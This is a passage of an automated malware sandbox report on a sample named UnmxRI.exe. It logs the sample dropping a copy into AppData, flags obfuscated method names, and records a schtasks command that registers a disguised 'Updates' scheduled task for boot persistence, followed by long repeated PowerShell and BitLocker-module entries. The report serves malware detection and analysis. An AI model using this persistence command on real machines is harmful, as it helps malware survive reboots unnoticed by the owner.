                    Source: 10.2.tehuvFgZlLZK.exe.2917b78.0.raw.unpack, Ft.csHigh entropy of concatenated method names: 'lZA', 'RgtTUJcyZL', 'dZ3', 'MZx', 'NZe', 'EZk', 'XNe8QK', 'mP', 'aY', 'ys'
                    Source: C:\Users\user\Desktop\UnmxRI.exeFile created: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpB814.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
